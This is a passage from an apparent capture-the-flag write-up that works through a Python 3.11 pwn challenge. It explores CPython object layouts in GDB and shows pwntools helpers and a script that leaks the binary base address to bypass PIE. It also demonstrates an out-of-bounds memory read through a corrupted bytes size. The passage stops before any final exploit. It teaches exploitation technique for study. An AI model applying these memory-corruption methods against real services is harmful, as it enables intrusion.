Fake Snake
29 minutes to read
We are given this Python script that is executed in the remote instance:
#!/usr/bin/env python
from _ctypes import PyObj_FromPtr
storage = {}
commands = f'''
Zero: {id(0)}
0) Add To Store
1) Remove From Store
2) Load Address
'''.strip()
while True:
print(commands)
match(input('Selection:')):
case '0':
inp = input('To Add:')
storage[id(inp)] = inp
print(id(inp))
del inp
case '1':
addr = input('To Remove:')
if addr.isdecimal() and int(addr) in storage:
del storage[int(addr)]
case '2':
addr = input('To Load:')
if addr.isdecimal():
print(PyObj_FromPtr(int(addr)))
else:
print('Invalid Address')
Further, we have a Dockerfile
:
FROM python@sha256:7ded8135894464123583e8a000e6e88aa8a114a634a3eebe8556d69f7e03ffc3
RUN apt update && \
apt install -y socat && \
rm -rf /var/lib/apt/lists/*
COPY challenge/server.py /
COPY challenge/flag.txt /
USER 1000
CMD ["socat", "tcp-l:1337,reuseaddr,fork", "EXEC:python3 -S ./server.py"]
There is no binary this time, so we must exploit the Python program using some Python internals primitives.
Setup environment
If we build the Docker image and run it on a container, we will see that we are dealing with Python 3.11.3:
# docker build -t pwn_fake_snake .
[+] Building 4.7s (9/9) FINISHED
=> [internal] load .dockerignore 0.0s
=> => transferring context: 2B 0.0s
=> [internal] load build definition from Dockerfile 0.0s
=> => transferring dockerfile: 344B 0.0s
=> [internal] load metadata for docker.io/library/python@sha256:7ded8135894464123583e8a000e6e88aa8a114a634a3eebe8556d69f7e03ffc3 0.0s
=> [1/4] FROM docker.io/library/python@sha256:7ded8135894464123583e8a000e6e88aa8a114a634a3eebe8556d69f7e03ffc3 1.9s
=> => resolve docker.io/library/python@sha256:7ded8135894464123583e8a000e6e88aa8a114a634a3eebe8556d69f7e03ffc3 0.0s
=> => sha256:7ded8135894464123583e8a000e6e88aa8a114a634a3eebe8556d69f7e03ffc3 1.37kB / 1.37kB 0.0s
=> => sha256:4c7870c9f1f753961c4e61166ecf70f851da452f8b5c098fceafe5a59f866daf 6.90kB / 6.90kB 0.0s
=> => sha256:9fbefa3370776b7ec7633cf07efc14cc24e0c0cd53893ad0e7e3f44ffdc1bedb 27.14MB / 27.14MB 1.1s
=> => sha256:a25702e0699eca20ab682bbfa60f6bb7775e4fb18ef65c038ffda342fdab9e3a 2.78MB / 2.78MB 0.5s
=> => sha256:970808dbe7d8b24a899ce97f54228fdc39129ac3098f4c519f34591f0a5bfb4c 11.98MB / 11.98MB 0.8s
=> => sha256:7ea720a5ba93c8f8ee2b7bab0d0de862fa1b8c3885409bbd9897a6ddbf3b507a 243B / 243B 0.9s
=> => sha256:7657e2f3a89a8d274a1e1f952b5112c88329d4ec172d66fcc25680409c802d35 3.37MB / 3.37MB 1.7s
=> => extracting sha256:9fbefa3370776b7ec7633cf07efc14cc24e0c0cd53893ad0e7e3f44ffdc1bedb 0.4s
=> => extracting sha256:a25702e0699eca20ab682bbfa60f6bb7775e4fb18ef65c038ffda342fdab9e3a 0.1s
=> => extracting sha256:970808dbe7d8b24a899ce97f54228fdc39129ac3098f4c519f34591f0a5bfb4c 0.2s
=> => extracting sha256:7ea720a5ba93c8f8ee2b7bab0d0de862fa1b8c3885409bbd9897a6ddbf3b507a 0.0s
=> => extracting sha256:7657e2f3a89a8d274a1e1f952b5112c88329d4ec172d66fcc25680409c802d35 0.1s
=> [internal] load build context 0.0s
=> => transferring context: 107B 0.0s
=> [2/4] RUN apt update && apt install -y socat && rm -rf /var/lib/apt/lists/* 2.6s
=> [3/4] COPY challenge/server.py / 0.0s
=> [4/4] COPY challenge/flag.txt / 0.0s
=> exporting to image 0.0s
=> => exporting layers 0.0s
=> => writing image sha256:97cb8e5f57ae290a28118c93ce8c81871c2aa32f7ba21e5e6ab8ebe01b139f88 0.0s
=> => naming to docker.io/library/pwn_fake_snake 0.0s
# docker run --rm -it pwn_fake_snake bash
I have no name!@38883a7537ad:/$ python3 --version
Python 3.11.3
I have no name!@38883a7537ad:/$ exit
exit
Since we will be dealing with Python objects in memory and other Python internals stuff, it will be handy to build Python 3.11 from source to have symbols in GDB (I used make altinstall
to keep my default Python version):
# cd /opt
# git clone https://github.com/python/cpython.git
Cloning into 'cpython'...
remote: Enumerating objects: 946090, done.
remote: Counting objects: 100% (1385/1385), done.
remote: Compressing objects: 100% (794/794), done.
remote: Total 946090 (delta 860), reused 939 (delta 589), pack-reused 944705
Receiving objects: 100% (946090/946090), 559.96 MiB | 29.98 MiB/s, done.
Resolving deltas: 100% (749546/749546), done.
# cd cpython
# git switch 3.11
Branch '3.11' set up to track remote branch '3.11' from 'origin'.
Switched to a new branch '3.11'
# ./configure
...
# make
...
# make altinstall
...
# python3 --version
Python 3.8.10
# python3.11 --version
Python 3.11.3+
The Python Developer’s Guide recommends using python-gdb.py
to have some extra functionalities in GDB:
$ echo 'add-auto-load-safe-path /opt/cpython/python-gdb.py' >> ~/.gdbinit
Nevertheless, I didn’t use them, just GDB with gef.
Source code analysis
The first thing that looks interesting in the script is the use of PyObj_FromPtr
from _ctypes
. This function takes an address and tries to parse a Python object. On the contrary, the use of id
is also interesting. This function returns the address of a given Python object.
For instance, we have id(0)
in the menu:
commands = f'''
Zero: {id(0)}
0) Add To Store
1) Remove From Store
2) Load Address
'''.strip()
The program creates a dict
object called storage
. Then, we have three options:
Allocation function
We can add a str
object and the dict
object will hold the address of the str
as key and the str
as value:
case '0':
inp = input('To Add:')
storage[id(inp)] = inp
print(id(inp))
del inp
Free function
With option 1
we can indicate a key (actually an address) to remove it from the dict
object:
case '1':
addr = input('To Remove:')
if addr.isdecimal() and int(addr) in storage:
Actually, I didn’t use this function in the exploit.
Information function
Finally, we have the chance to load any Python object as long as we know the exact memory address where it is allocated:
case '2':
addr = input('To Load:')
if addr.isdecimal():
print(PyObj_FromPtr(int(addr)))
else:
print('Invalid Address')
Learning Python internals
I was new to Python internals, so I needed to play a bit with the Python REPL inside GDB to observe how Python objects are stored in memory. However, I wrote a Python script similar to the challenge with some functions to test them within GDB:
from _ctypes import PyObj_FromPtr
storage = {}
print(f'Zero: {id(0)}')
def add(inp):
storage[id(inp)] = inp
print(id(inp))
del inp
def remove(addr):
if addr.isdecimal() and int(addr) in storage:
del storage[int(addr)]
print('removed')
def load(addr):
if addr.isdecimal():
print(PyObj_FromPtr(int(addr)))
else:
print('Invalid Address')
Now we can debug python3.11
as a binary and run it with -i
flag to have the REPL once the code is loaded:
$ gdb -q python3.11
Reading symbols from python3.11...
gef➤ run -i test.py
Starting program: /usr/local/bin/python3.11 -i test.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Zero: 93824997988328
>>>
During the challenge resolution, I found some useful resources to learn Python internals:
- Let’s break CPython together, for fun and mischief
- Exploiting a Use-After-Free for code execution in every version of Python 3
- cpython
- Exploring the Internals
Python objects
After reading some resources on Python internals, we will see that the relevant structure is PyObject
(aliased from _object
, which is defined here):
/* Nothing is actually declared to be a PyObject, but every pointer to
* a Python object can be cast to a PyObject*. This is inheritance built
* by hand. Similarly every pointer to a variable-size Python object can,
* in addition, be cast to PyVarObject*.
*/
struct _object {
_PyObject_HEAD_EXTRA
Py_ssize_t ob_refcnt;
PyTypeObject *ob_type;
};
For instance, we can parse the address printed by id(0)
as a PyObject
in GDB:
gef➤ p *(PyObject *) 93824997988328
$1 = {
ob_refcnt = 0x3b9acc52,
ob_type = 0x5555559db5a0 <PyLong_Type>
}
As can be seen, there is a ob_refcnt
field that tells the number of references to this object (it makes sense that 0
is widely used in a program) and a pointer the type object (PyLong_Type
). We can be more specific and parse the object as PyLongObject
to see more information:
gef➤ p *(PyLongObject *) 93824997988328
$2 = {
ob_base = {
ob_base = {
ob_refcnt = 0x3b9acc52,
ob_type = 0x5555559db5a0 <PyLong_Type>
},
ob_size = 0x0
},
ob_digit = {0x0}
}
The int
value 0
is initialized in memory when the program starts. This was a decision from the developers to improve performance, since this Python object will be used a lot. In fact, integers from -5
to 256
(included) are initialized as well:
gef➤ x/30gx 93824997988328
0x555555ad17e8 <_PyRuntime+840>: 0x000000003b9acc52 0x00005555559db5a0
0x555555ad17f8 <_PyRuntime+856>: 0x0000000000000000 0x0000000000000000
0x555555ad1808 <_PyRuntime+872>: 0x000000003b9acae7 0x00005555559db5a0
0x555555ad1818 <_PyRuntime+888>: 0x0000000000000001 0x0000000000000001
0x555555ad1828 <_PyRuntime+904>: 0x000000003b9aca8c 0x00005555559db5a0
0x555555ad1838 <_PyRuntime+920>: 0x0000000000000001 0x0000000000000002
0x555555ad1848 <_PyRuntime+936>: 0x000000003b9aca3c 0x00005555559db5a0
0x555555ad1858 <_PyRuntime+952>: 0x0000000000000001 0x0000000000000003
0x555555ad1868 <_PyRuntime+968>: 0x000000003b9aca55 0x00005555559db5a0
0x555555ad1878 <_PyRuntime+984>: 0x0000000000000001 0x0000000000000004
0x555555ad1888 <_PyRuntime+1000>: 0x000000003b9aca27 0x00005555559db5a0
0x555555ad1898 <_PyRuntime+1016>: 0x0000000000000001 0x0000000000000005
0x555555ad18a8 <_PyRuntime+1032>: 0x000000003b9aca1e 0x00005555559db5a0
0x555555ad18b8 <_PyRuntime+1048>: 0x0000000000000001 0x0000000000000006
0x555555ad18c8 <_PyRuntime+1064>: 0x000000003b9aca18 0x00005555559db5a0
gef➤ p *(PyLongObject *) 0x555555ad18a8
$3 = {
ob_base = {
ob_base = {
ob_refcnt = 0x3b9aca1e,
ob_type = 0x5555559db5a0 <PyLong_Type>
},
ob_size = 0x1
},
ob_digit = {0x6}
}
This will be useful for exploitation because these objects are stored in the binary (note that the address starts with 0x555555
, without ASLR). Therefore, having the address of 0
will give us directly the base address of the binary to bypass PIE.
Let’s continue exploring. It is well known that strings in Python are immutable, so let’s see what we have:
>>> add('a')
93824997520288
>>> id('a')
93824997520288
gef➤ p *(PyObject *) 93824997520288
$4 = {
ob_refcnt = 0x3b9aca08,
ob_type = 0x5555559e51a0 <PyUnicode_Type>
}
It shows PyUnicode_Type
. We can parse it as a PyUnicodeObject
:
gef➤ p *(PyUnicodeObject *) 93824997520288
$5 = {
_base = {
_base = {
ob_base = {
ob_refcnt = 0x3b9aca08,
ob_type = 0x5555559e51a0 <PyUnicode_Type>
},
length = 0x1,
hash = 0x806980da7df19e68,
state = {
interned = 0x1,
kind = 0x1,
compact = 0x1,
ascii = 0x1,
ready = 0x1
},
wstr = 0x0
},
utf8_length = 0x61,
utf8 = 0x0,
wstr_length = 0x3b9ac9ff
},
data = {
any = 0x5555559cbac0 <PyBytes_Type>,
latin1 = 0x5555559cbac0 <PyBytes_Type> "J",
ucs2 = 0x5555559cbac0 <PyBytes_Type>,
ucs4 = 0x5555559cbac0 <PyBytes_Type>
}
}
But it looks a bit weird. In fact, the ASCII value for a
is 0x61
, and it appears as utf8_length
… That does not make sense. If we take a look at unicodeobject.h
, we see that there are other structures for str
objects, such as PyASCIIObject
:
gef➤ p *(PyASCIIObject *) 93824997520288
$6 = {
ob_base = {
ob_refcnt = 0x3b9aca08,
ob_type = 0x5555559e51a0 <PyUnicode_Type>
},
length = 0x1,
hash = 0x846afae1d6f9bca6,
state = {
interned = 0x1,
kind = 0x1,
compact = 0x1,
ascii = 0x1,
ready = 0x1
},
wstr = 0x0
}
gef➤ x/8gx 93824997520288
0x555555a5f3a0 <const_str_a>: 0x000000003b9aca08 0x00005555559e51a0
0x555555a5f3b0 <const_str_a+16>: 0x0000000000000001 0x846afae1d6f9bca6
0x555555a5f3c0 <const_str_a+32>: 0x00000000000000e5 0x0000000000000000
0x555555a5f3d0 <const_str_a+48>: 0x0000000000000061 0x0000000000000000
As said in the source code, the actual string data is right after the struct
. As happened with the value of 0
, characters are also loaded in a certain memory address at startup.
Now, let’s see how the dict
objects are stored. Let’s use storage
as an example:
>>> storage
{93824997520288: 'a'}
>>> id(storage)
140737339407232
gef➤ p *(PyObject *) 140737339407232
$7 = {
ob_refcnt = 0x1,
ob_type = 0x5555559dc640 <PyDict_Type>
}
Specifically, this is a PyDictObject
:
gef➤ p *(PyDictObject *) 140737339407232
$8 = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559dc640 <PyDict_Type>
},
ma_used = 0x1,
ma_version_tag = 0x66ec,
ma_keys = 0x7ffff70dec90,
ma_values = 0x0
}
The source code for PyDictObject
is this one:
typedef struct _dictkeysobject PyDictKeysObject;
typedef struct _dictvalues PyDictValues;
/* The ma_values pointer is NULL for a combined table
* or points to an array of PyObject* for a split table
*/
typedef struct {
PyObject_HEAD
/* Number of items in the dictionary */
Py_ssize_t ma_used;
/* Dictionary version: globally unique, value change each time
the dictionary is modified */
uint64_t ma_version_tag;
PyDictKeysObject *ma_keys;
/* If ma_values is NULL, the table is "combined": keys and values
are stored in ma_keys.
If ma_values is not NULL, the table is split:
keys are stored in ma_keys and values are stored in ma_values */
PyDictValues *ma_values;
} PyDictObject;
It is a bit confusing since ma_values
can contain a list of values or not. However, this is not relevant for exploitaiton. Let’s see what we have in ma_keys
:
gef➤ p *(PyDictKeysObject *) 0x7ffff70dec90
$9 = {
dk_refcnt = 0x1,
dk_log2_size = 0x3,
dk_log2_index_bytes = 0x3,
dk_kind = 0x0,
dk_version = 0x0,
dk_usable = 0x4,
dk_nentries = 0x1,
dk_indices = 0x7ffff70decb0 ""
}
This is the relevant structure:
/* See dictobject.c for actual layout of DictKeysObject */
struct _dictkeysobject {
Py_ssize_t dk_refcnt;
/* Size of the hash table (dk_indices). It must be a power of 2. */
uint8_t dk_log2_size;
/* Size of the hash table (dk_indices) by bytes. */
uint8_t dk_log2_index_bytes;
/* Kind of keys */
uint8_t dk_kind;
/* Version number -- Reset to 0 by any modification to keys */
uint32_t dk_version;
/* Number of usable entries in dk_entries. */
Py_ssize_t dk_usable;
/* Number of used entries in dk_entries. */
Py_ssize_t dk_nentries;
/* Actual hash table of dk_size entries. It holds indices in dk_entries,
or DKIX_EMPTY(-1) or DKIX_DUMMY(-2).
Indices must be: 0 <= indice < USABLE_FRACTION(dk_size).
The size in bytes of an indice depends on dk_size:
- 1 byte if dk_size <= 0xff (char*)
- 2 bytes if dk_size <= 0xffff (int16_t*)
- 4 bytes if dk_size <= 0xffffffff (int32_t*)
- 8 bytes otherwise (int64_t*)
Dynamically sized, SIZEOF_VOID_P is minimum. */
char dk_indices[]; /* char is required to avoid strict aliasing. */
/* "PyDictKeyEntry or PyDictUnicodeEntry dk_entries[USABLE_FRACTION(DK_SIZE(dk))];" array follows:
see the DK_ENTRIES() macro */
};
Curiously, dk_indices
is a char[]
. Let’s add another item to storage
:
>>> add('asdf')
140737338225328
Just to verify, let’s see if we can parse this string correctly:
gef➤ p *(PyASCIIObject *) 140737338225328
$10 = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559e51a0 <PyUnicode_Type>
},
length = 0x4,
hash = 0xad8cd6c17573b37b,
state = {
interned = 0x1,
kind = 0x1,
compact = 0x1,
ascii = 0x1,
ready = 0x1
},
wstr = 0x0
}
gef➤ x/8gx 140737338225328
0x7ffff70d32b0: 0x0000000000000001 0x00005555559e51a0
0x7ffff70d32c0: 0x0000000000000004 0xad8cd6c17573b37b
0x7ffff70d32d0: 0x01650065000200e5 0x0000000000000000
0x7ffff70d32e0: 0x3333370066647361 0x0032333237303439
gef➤ telescope 140737338225328
0x00007ffff70d32b0│+0x0000: 0x0000000000000001
0x00007ffff70d32b8│+0x0008: 0x00005555559e51a0 → 0x000000000000005a ("Z"?)
0x00007ffff70d32c0│+0x0010: 0x0000000000000004
0x00007ffff70d32c8│+0x0018: 0xad8cd6c17573b37b
0x00007ffff70d32d0│+0x0020: 0x01650065000200e5
0x00007ffff70d32d8│+0x0028: 0x0000000000000000
0x00007ffff70d32e0│+0x0030: 0x3333370066647361 ("asdf"?)
0x00007ffff70d32e8│+0x0038: 0x0032333237303439 ("9407232"?)
0x00007ffff70d32f0│+0x0040: 0x00007ffff70d3330 → 0x00007ffff70d3370 → 0x0000000000000000
0x00007ffff70d32f8│+0x0048: 0x00005555559e51a0 → 0x000000000000005a ("Z"?)
If we look now at dk_indices
of storage
, we have this:
gef➤ x/10gx 0x7ffff70decb0
0x7ffff70decb0: 0xff01ffffffffff00 0x0000555555a5f3a0
0x7ffff70decc0: 0x00007ffff726afb0 0x0000555555a5f3a0
0x7ffff70decd0: 0x00007ffff70d32b0 0x00007ffff726afd0
0x7ffff70dece0: 0x00007ffff70d32b0 0x0000000000000000
0x7ffff70decf0: 0x0000000000000000 0x0000000000000000
It looks very weird becasue both keys and values are stored here. Actually, this is a hash table. The first value 0x0000555555a5f3a0
is a key (the address of 'a'
), then, 0x00007ffff726afb
contains a PyLongObject
:
gef➤ p *(PyObject *) 0x00007ffff726afb0
$11 = {
ob_refcnt = 0x1,
ob_type = 0x5555559db5a0 <PyLong_Type>
}
gef➤ p *(PyLongObject *) 0x00007ffff726afb0
$12 = {
ob_base = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559db5a0 <PyLong_Type>
},
ob_size = 0x2
},
ob_digit = {0x15a5f3a0}
}
Here I noticed that the int
value here is 0x15a5f3a0
, which is very similar to 0x0000555555a5f3a0
. Actually, it represents the lower 4-bytes of the address (almost):
gef➤ p/x 0x0000555555a5f3a0 & 0x3fffffff
$13 = 0x15a5f3a0
So, this value probably acts like a hash. And next we have 0x0000555555a5f3a0
, which is the address of 'a'
. This looks a bit confusing because storage
uses the address of the str
object as key… This is the hash value of the second entry:
gef➤ p *(PyObject *) 0x00007ffff726aff0
$14 = {
ob_refcnt = 0x1,
ob_type = 0x5555559db5a0 <PyLong_Type>
}
gef➤ p *(PyLongObject *) 0x00007ffff726aff0
$15 = {
ob_base = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559db5a0 <PyLong_Type>
},
ob_size = 0x2
},
ob_digit = {0x370d31f0}
}
gef➤ p/x 0x00007ffff70d31f0 & 0x3fffffff
$16 = 0x370d31f0
If we delete a key, it is removed from memory:
>>> storage
{93824997520288: 'a', 140737338225328: 'asdf'}
>>> remove('93824997520288')
removed
>>> storage
{140737338225328: 'asdf'}
gef➤ x/10gx 0x7ffff70decb0
0x7ffff70decb0: 0xffff01fffffffffe 0x0000000000000000
0x7ffff70decc0: 0x0000000000000000 0x0000000000000000
0x7ffff70decd0: 0x00007ffff70d32b0 0x00007ffff726afd0
0x7ffff70dece0: 0x00007ffff70d32b0 0x0000000000000000
0x7ffff70decf0: 0x0000000000000000 0x0000000000000000
Fake objects
While reading Exploiting a Use-After-Free for code execution in every version of Python 3, I understood that in order to exploit a Python application, one way is to craft fake objects in memory to confuse Python (similar to JavaScript exploits for browsers).
There are two similar structures that are mentioned in the article: bytearray
and bytes
.
>>> x = bytearray([1, 2, 3, 4, 5])
>>> id(x)
140737338225200
>>> y = bytes([1, 2, 3, 4, 5])
>>> id(y)
140737338064160
They behave like this in memory:
gef➤ p *(PyObject *) 140737338064160
$17 = {
ob_refcnt = 0x1,
ob_type = 0x5555559cbac0 <PyBytes_Type>
}
gef➤ p *(PyBytesObject *) 140737338064160
$18 = {
ob_base = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559cbac0 <PyBytes_Type>
},
ob_size = 0x5
},
ob_shash = 0xffffffffffffffff,
ob_sval = "\001"
}
gef➤ p *(PyObject *) 140737338225200
$19 = {
ob_refcnt = 0x1,
ob_type = 0x5555559cac60 <PyByteArray_Type>
}
gef➤ p *(PyByteArrayObject *) 140737338225200
$20 = {
ob_base = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559cac60 <PyByteArray_Type>
},
ob_size = 0x5
},
ob_alloc = 0x6,
ob_bytes = 0x7ffff73d85f0 "\001\002\003\004\005",
ob_start = 0x7ffff73d85f0 "\001\002\003\004\005",
ob_exports = 0x0
}
The differences between bytearray
and bytes
objects is that the first is mutable, whereas the second is immutable. Notice that both of them have a field named ob_size
that indicates the length of the object.
The program allows us to show these objects with option 2
:
>>> load('140737338225200')
bytearray(b'\x01\x02\x03\x04\x05')
>>> load('140737338064160')
b'\x01\x02\x03\x04\x05'
With all this knowledge, let’s start with the exploit.
Exploit development
I will use these helper functions:
def add(p, inp: bytes) -> int:
p.sendlineafter(b'Selection:', b'0')
p.sendlineafter(b'To Add:', inp)
return int(p.recvline().decode())
def remove(p, addr: int):
p.sendlineafter(b'Selection:', b'1')
p.sendlineafter(b'To Remove:', str(addr).encode())
def load(p, addr: int, do_recv: bool = True) -> bytes:
p.sendlineafter(b'Selection:', b'2')
p.sendlineafter(b'To Load:', str(addr).encode())
return p.recvline() if do_recv else b''
First of all, the program gives us a memory leak of the int
value 0
(we could have also used the address of 'a'
):
>>> id(0)
93824997988328
And this address is within the binary, so we can get the offset and find the base address of the binary:
gef➤ vmmap
[ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x0000555555554000 0x0000555555641000 0x0000000000000000 r-- /usr/local/bin/python3.11
0x0000555555641000 0x00005555558b5000 0x00000000000ed000 r-x /usr/local/bin/python3.11
0x00005555558b5000 0x000055555599b000 0x0000000000361000 r-- /usr/local/bin/python3.11
0x000055555599b000 0x00005555559ca000 0x0000000000446000 r-- /usr/local/bin/python3.11
0x00005555559ca000 0x0000555555afa000 0x0000000000475000 rw- /usr/local/bin/python3.11
0x0000555555afa000 0x0000555555ca3000 0x0000000000000000 rw- [heap]
0x00007ffff6ff3000 0x00007ffff6ff5000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
0x00007ffff6ff5000 0x00007ffff6ffb000 0x0000000000002000 r-x /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
0x00007ffff6ffb000 0x00007ffff6ffc000 0x0000000000008000 r-- /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
0x00007ffff6ffc000 0x00007ffff6ffd000 0x0000000000009000 --- /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
0x00007ffff6ffd000 0x00007ffff6ffe000 0x0000000000009000 r-- /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
0x00007ffff6ffe000 0x00007ffff6fff000 0x000000000000a000 rw- /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
0x00007ffff6fff000 0x00007ffff7006000 0x0000000000000000 r-- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007ffff7006000 0x00007ffff7017000 0x0000000000007000 r-x /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007ffff7017000 0x00007ffff701d000 0x0000000000018000 r-- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007ffff701d000 0x00007ffff701e000 0x000000000001d000 r-- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007ffff701e000 0x00007ffff7022000 0x000000000001e000 rw- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007ffff7022000 0x00007ffff7155000 0x0000000000000000 rw-
0x00007ffff7155000 0x00007ffff7163000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libtinfo.so.6.2
...
0x00007ffff7ffc000 0x00007ffff7ffd000 0x000000000002c000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x00007ffff7ffd000 0x00007ffff7ffe000 0x000000000002d000 rw- /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw-
0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
0xffffffffff600000 0xffffffffff601000 0x0000000000000000 --x [vsyscall]
gef➤ p/x 93824997988328
$21 = 0x555555ad17e8
gef➤ p/d 0x555555ad17e8 - 0x0000555555554000
$22 = 5756904
So, we can use this code:
def main():
p = process(['python3.11', 'challenge/server.py'], level='DEBUG')
gdb.attach(p, 'continue')
p.recvuntil(b'Zero: ')
zero_addr = int(p.recvline())
p.info(f'id(0) = {hex(zero_addr)}')
python_base_addr = zero_addr - 5756904
p.success(f'Python base address: {hex(python_base_addr)}')
p.interactive()
$ python3 solve.py
[+] Starting local process '/usr/local/bin/python3.11' argv=[b'python3.11', b'challenge/server.py'] : pid 737816
[*] running in new terminal: ['/usr/bin/gdb', '-q', '/usr/local/bin/python3.11', '737816', '-x', '/tmp/pwnpwdk5bfs.gdb']
[+] Waiting for debugger: Done
[DEBUG] Received 0x54 bytes:
b'Zero: 94128788563944\n'
b'0) Add To Store\n'
b'1) Remove From Store\n'
b'2) Load Address\n'
b'Selection:'
[*] id(0) = 0x559c110167e8
[+] Python base address: 0x559c10a99000
[*] Switching to interactive mode
1) Add To Store
2) Remove From Store
3) Load Address
Selection:$
And the base address of the binary looks correct:
gef➤ vmmap
[ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x0000559c10a99000 0x0000559c10b86000 0x0000000000000000 r-- /usr/local/bin/python3.11
0x0000559c10b86000 0x0000559c10dfa000 0x00000000000ed000 r-x /usr/local/bin/python3.11
0x0000559c10dfa000 0x0000559c10ee0000 0x0000000000361000 r-- /usr/local/bin/python3.11
0x0000559c10ee0000 0x0000559c10f0f000 0x0000000000446000 r-- /usr/local/bin/python3.11
0x0000559c10f0f000 0x0000559c1103f000 0x0000000000475000 rw- /usr/local/bin/python3.11
0x0000559c1103f000 0x0000559c11082000 0x0000000000000000 rw-
0x0000559c12df3000 0x0000559c12e8e000 0x0000000000000000 rw- [heap]
0x00007fc6f92e5000 0x00007fc6f92ec000 0x0000000000000000 r-- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007fc6f92ec000 0x00007fc6f92fd000 0x0000000000007000 r-x /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007fc6f92fd000 0x00007fc6f9303000 0x0000000000018000 r-- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
...
Leaking memory addresses
This part is not actually needed for the exploit, but it is interesting.
Let’s return for a moment to test.py
and the bytes
object:
$ gdb -q python3.11
Reading symbols from python3.11...
gef➤ run -i test.py
Starting program: /usr/local/bin/python3.11 -i test.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Zero: 93824997988328
>>> x = bytes([1, 2, 3, 4, 5])
>>> id(x)
140737338006704
>>> load('140737338006704')
b'\x01\x02\x03\x04\x05'
gef➤ p *(PyBytesObject *) 140737338006704
$1 = {
ob_base = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559cbac0 <PyBytes_Type>
},
ob_size = 0x5
},
ob_shash = 0xffffffffffffffff,
ob_sval = "\001"
}
gef➤ x/30gx 140737338006704
0x7ffff709dcb0: 0x0000000000000001 0x00005555559cbac0
0x7ffff709dcc0: 0x0000000000000005 0xffffffffffffffff
0x7ffff709dcd0: 0x0000000504030201 0x0000000000000000
0x7ffff709dce0: 0x00007ffff709f870 0x00007ffff70aef10
0x7ffff709dcf0: 0x0000000000000001 0x00005555559e1c60
0x7ffff709dd00: 0x0000000000000001 0x0000555555b7e020
0x7ffff709dd10: 0x00007ffff709e460 0x00007ffff709dd40
0x7ffff709dd20: 0x0000000000000001 0x00005555559efd40
0x7ffff709dd30: 0x0000000000000002 0x00007ffff726fe60
0x7ffff709dd40: 0x00007ffff709dd10 0x0000555555adfd78
0x7ffff709dd50: 0x0000000000000001 0x00005555559efd40
0x7ffff709dd60: 0x0000000000000001 0x00007ffff7284260
0x7ffff709dd70: 0x00007ffff709dda0 0x00007ffff709dc80
0x7ffff709dd80: 0x0000000000000001 0x00005555559efd40
0x7ffff709dd90: 0x0000000000000001 0x00007ffff7284260
As can be seen, the actual data appears at address 0x7ffff709dcd0
(0x0000000504030201
). After that, we have a lot of memory addresses (from _ctypes
). What if we modify the memory and set a bigger size?
gef➤ set *0x7ffff709dcc0 = 0xf0
gef➤ p *(PyBytesObject *) 140737338006704
$2 = {
ob_base = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559cbac0 <PyBytes_Type>
},
ob_size = 0xf0
},
ob_shash = 0xffffffffffffffff,
ob_sval = "\001"
}
gef➤ continue
Continuing.
>>> load('140737338006704')
b'\x01\x02\x03\x04\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\xf8\t\xf7\xff\x7f\x00\x00\x10\xef\n\xf7\xff\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00`\x1c\x9eUUU\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 \xe0\xb7UUU\x00\x00`\xe4\t\xf7\xff\x7f\x00\x00@\xdd\t\xf7\xff\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00@\xfd\x9eUUU\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00`\xfe&\xf7\xff\x7f\x00\x00\x10\xdd\t\xf7\xff\x7f\x00\x00x\xfd\xadUUU\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00@\xfd\x9eUUU\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00`B(\xf7\xff\x7f\x00\x00\xa0\xdd\t\xf7\xff\x7f\x00\x00\x80\xdc\t\xf7\xff\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00@\xfd\x9eUUU\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00`B(\xf7\xff\x7f\x00\x00P\xdf\t\xf7\xff\x7f\x00\x00p\xdd\t\xf7\xff\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00@\xfd\x9eUUU\x00\x00'
Incredible, isn’t it? Now we must figure out if we are able to get this read primitive in the program.
Let’s try to add a large string:
